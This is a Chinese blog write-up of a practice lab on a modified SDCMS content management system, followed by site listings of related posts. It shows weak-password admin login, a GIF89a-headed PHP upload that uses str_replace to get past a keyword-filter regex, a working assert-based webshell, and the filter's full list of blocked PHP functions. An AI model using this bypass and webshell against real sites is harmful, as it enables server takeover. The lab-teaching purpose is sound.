内部靶场系列|Sdcms

已于 2024-04-18 15:52:11 修改
阅读量846 收藏 8
点赞数 1
文章标签: 安全 网络安全 web安全 sql 数据库
于 2023-06-09 16:32:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kailiaq_1/article/details/131130537
版权

一、 靶场考核点

靶场说明:魔改后的cms

漏洞类型:任意文件上传

难点:合适的文件头部,文件内容需要绕过正则拦截

二、 靶场复现

1、 弱口令进入后台 admin/admin

http://192.168.93.225:84/?m=admin

2、选择文件上传

3、上传jpg后缀的文件

4、提示非法图像文件,初步怀疑会检测文件头,添加GIF89a

5、还是提示非法图像文件,尝试上传正常的图片,发现可以上传

6、猜测是否会检测文件内容,尝试上传未带有关键字的文件内容,发现上传成功

7、由此可见,该应用会检测文件内容是否带有关键字段,先查看是否能上传php文件,且是否能解析php代码

8、绕过关键字拦截进行上传

GIF89a

<?php

$a = str_replace("b", "", "phpbinfob");

$a();

           ?>

9、访问

10、ctrl+f 搜索flag

11、上传webshell

GIF89a

<?php

               $a = str_replace("b", "", "absbsbebrbt");

               $a($_POST['csb666']);

           ?>

12、连接webshell

三、 漏洞分析

1、根据关键字定位业务关键代码

2、其中/app/admin/controller/upload.php为后台上传相关代码,通读代码发现此文件跟漏洞关联性不大

/app/lib/class/sdcms_upload.php为文件上传相关代码,定义了白名单

3、这里将 php  添加进了白名单

请求中的type参数决定了是图片文件,还是视频文件,或者是附件文件

(这里我修改了 type =1   type=3,方便在上传图片、附件进行测试)

如果上传文件的后缀名,不在白名单里的话,会提示文件类型错误

4、单纯的在这里加了白名单,那么任意的php文件都可以上传,显得有点简单,因此继续往下面看代码

如果在这个if语句这里添加 “.php”,那么上传的php文件进入到这个判断里来

5、这个判断语句中的check_bad 函数会检测上传的文件是否合法

6、全局搜索check_bad 函数,发现正则匹配来拦截关键字

$num=preg_match_all("/(phpinfo|pack\(|str_rot13|system\(|eval\(|request\(|execute\(|file_put_contents|file_get_contents|exec\(|chroot\(|scandir\(|chgrp\(|chown\(|proc_open\(|popen\(|putenv\(|proc_get_status|error_log\(|ini_alter\(|ini_set\(|ini_restore\(|dll\(|pfsockopen\(|syslog\(|readlink\(|symlink\(|stream_socket_server|preg_replace\(|delfolder\(|unlink\(|mkdir\(|fopen\(|fread\(|fwrite\(|fputs\(|tmpfile\(|flock\(|load_file\(|outfile\(|chmod\(|delete\(|payload\(|assert\(|cmdshell\(|wshshell\(|_post\(|_get\(|_file\(|create_function|call_user_func|passthru\(|array_walk|getenv\(|register_|escapeshellcmd\(|rmdir\(|rename\(|readfile\(|session_|array_filter|array_flip|array_merge|shell_|parse_str|glob\(|import_|get_defined_|get_included_)/Ui",str_replace(["'.'","\".\""],"",$str),$match);

7、既然知道了拦截规则,那么现在就来绕过。由上可知,该函数基本上拦截常见的关键字(eg: phpinfo),但是规则是死的,人是活的,只要将关键字进行拆分、隔开等就可以实现绕过。

这里用的是str_replace 函数(替换字符串)从一串字符中提出关键字

如:

Phpinfo()

<?php

$a = str_replace("b", "", "phpbinfob");

$a();

           ?>

//将b替换为空  phpbinfob  ---> phpinfo

Webshell

<?php

               $a = str_replace("b", "", "absbsbebrbt");

               $a($_POST['csb666']);

           ?>

// absbsbebrbt  ---> assert

8、上传webhsell

白帽子凯哥
关注
BEECMS靶场 -->漏洞挖掘
huohaowen的博客
12-26 1504
本篇blog包含文件上传,弱口令,存储型XSS
sdcms2.0正式版
10-18
sdcms2.0正式版
毕业实习(一)pikachu靶场与弱口令爆破
最新发布
Nightwiggle的博客
08-27 592
2.在攻击模式Pitchfork中,会对把多组payload和字典一一对应,是一种多参数的并行攻击模式,也就是说它允许攻击者同时测试多个位置,每个位置使用独立的有效载荷集。跟Pitchfork相似的是多个密码本对应多个位置,不同的是不再是一一对应,而是交叉组合,每一个密码本里的密码都对应于另一密码本所有密码。(1)跳板机(Jump Server/Bastion Host):通过部署在 DMZ 区域的跳板机,外部用户可以先连接到跳板机,然后再访问内部网络的资源。把define('DBPW', '');
内部靶场系列|BeesCms
白帽子凯哥聊黑客
05-30 1351
校验上传文件的content-type字段,如果content-type字段是允许上传的类型,则上传成功,否则上传失败。所以这里我们只要在数据包中修改content-type字段,就可以绕过上传校验,上传webshell。审计代码得知,该靶场的Content-Type白名单是image/gif。,只是这靶场我把Content-Type白名单限定到只有一个。修改Content-Type白名单为 image/gif。1、 弱口令进入系统后台,文件上传。1、 使用弱口令登录进后台。2、 文件上传点的逻辑。
靶场练习——SDcms文件上传漏洞靶场
p36273的博客
09-15 1256
今次练习的是SDcms靶场,该靶场是一个文件上传漏洞系列靶场靶场如下: 如图所示,登录页面参数是?m=login尝试把上面URL的参数login改成admin,如下图,进入成功。 这里第一反应使用了账号密码爆破,发现对访问的IP有限制,一旦超过错误访问次数,就会被限制登录,图片如下: 使用账号密码admin/admin,成登录网站后台 找到如图所示的文件上传点 如图找到文件上传的路径:/upfile/2023/09/在Burp中把 .jpg 改成 .php,然后再文件内容中添加GIF89a头部,发现ph
SDCMS靶场漏洞挖掘
huohaowen的博客
12-25 1923
本篇blog主要是sdcms靶场漏洞挖掘
sdcms1.3.1商业版
06-06
sdcms1.3.1商业版 geiar.com
SDCMS网站建设模版系列源代码
03-18
SDCMS企业建站模版系列 此模版适用于SDCMS网站内容管理系统 1.3或1.3.1 下载模版后解压缩到根目录Skins文件包内即可 文件内部分内容需要自行修改 若不懂可以参考SDCMS手册或者与我联系!
sdcms3.1.zip
04-05
SDCMS3.1作为其第三个主要版本,带来了许多优化和改进,旨在提升用户体验和管理效率。 在SDCMS3.1中,我们可以看到以下关键知识点: 1. **模块化设计**:SDCMS3.1采用了模块化的结构,允许用户根据需求安装和卸载...
SDCMS网站建设模版系列 v1.3.1
10-17
在“SDCMS网站建设模版系列 v1.3.1”中,用户可以利用这一模板快速搭建专业的企业网站。该版本1.3.1是SDCMS系统的一个迭代更新,可能包含性能优化、新功能添加或已知问题修复。 模版适用于SDCMS 1.3或1.3.1,这意味...
ASP实例开发源码-SDCMS网站建设模版系列 v1.3.1.zip
11-15
ASP实例开发源码—SDCMS网站建设模版系列 v1.3.1.zip ASP实例开发源码—SDCMS网站建设模版系列 v1.3.1.zip ASP实例开发源码—SDCMS网站建设模版系列 v1.3.1.zip
SDCMS三网合一企业网站管理系统 v1.3
11-26
SDCMS三网合一企业网站管理系统是一个以PHP+MySQL进行开发的三网合一网站源码。 SDCMS三网合一企业网站管理系统 v1.3更新日志: 本次更新改动记录如下: 新增功能: 01、新增一个内容可
sdcms机械设备行业电脑+手机站.zip
10-10
cs.lsina.com/sj1920/ 演示版 1、(asp+access已安装),上传即可使用,带后台,简洁、安全、强大。 2、源码可选择动态、伪静态、静态三种模式; 3、源码可在后台一键生成sitemap; 4、支持上传图片设置水印; 5、支持二级目录建站! 6、新增:手机站支持生成html文件 7、动态、伪静态模式下,支持绑定手机站域名; 8、内容支持生成专属二维码。
SDCMS微信公众平台管理系统ASP版 v1.x.rar
07-10
SDCMS微信公众平台管理系统,SDCMS一向都比较好用,还记SDCMS吗?被很多站长改成了各种站点,比如网址站、文章站、地方门户等。这个微信公众平台管理系统同样是来自SDCMS团队,功能模块有:关注回复、自动回复、关键字回复、自定义菜单、个性化菜单、粉丝管理、消息管理、图文素材、群发管理、微支付插件、微投票插件等,有兴趣的可以一试哦。
SDCMS2.0深度优化版
03-23
  时代网站信息管理系统( SDCMS )是由SDCMS团队基于Asp+Access/Mssql环境下开发的开源产品。SDCMS 内置新闻、组图、视频、下载四大内容模型,在很大程度上满足了更多层次用户的需求和发展需要。会员组、第三方用户登录、用户充值支付、用户投稿等功能,加强网站的互动性的同时也可为网站的发展带来一定的盈利模式。   SDCMS 开发了全新的、高效的、灵活性更强的模板引擎。无限循环标签、一个参数即可实现分页、数据缓存等功能,支持条件判断,系统函数直接调用等灵活的功能。   SDCMS安全第一为原则,解决了ASP程序的常见漏洞问题。程序自身无任何后门,严格的代码过滤为网站的安全运行提供了可靠的保障。
sdcms门户版V3.1biz
07-03
以前一个网络公司给做的网站,现在公司不做了,把网站源码分享给想学习的朋友,里面有很多修改的文件和备份,对学习比较方便。
SDCMS蓝色系列包装行业网站 v2.7.2.zip
04-02
SDCMS蓝色系列包装行业网站 v2.7.2是一个基于Web的开源内容管理系统,专为包装行业的企业或组织设计。这个版本2.7.2包含了系统优化和功能增强,旨在提供一个高效、易于管理和定制的网站平台。让我们深入探讨这个系统...
sdcms的模板解析引擎,一个非常简单和实用的CMS
weixin_30702413的博客
07-03 284
代码 <%'=============================='SDCMS模板解析引擎'Author:IT平民'Date:2009年4-5月'==============================Class Templates Private Rs,Reg,LabelData Private Sub Class_Initialize ...
SDCMS2.0、3.0最全标签整理
GeoBase的博客
01-06 874
SDCMS
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值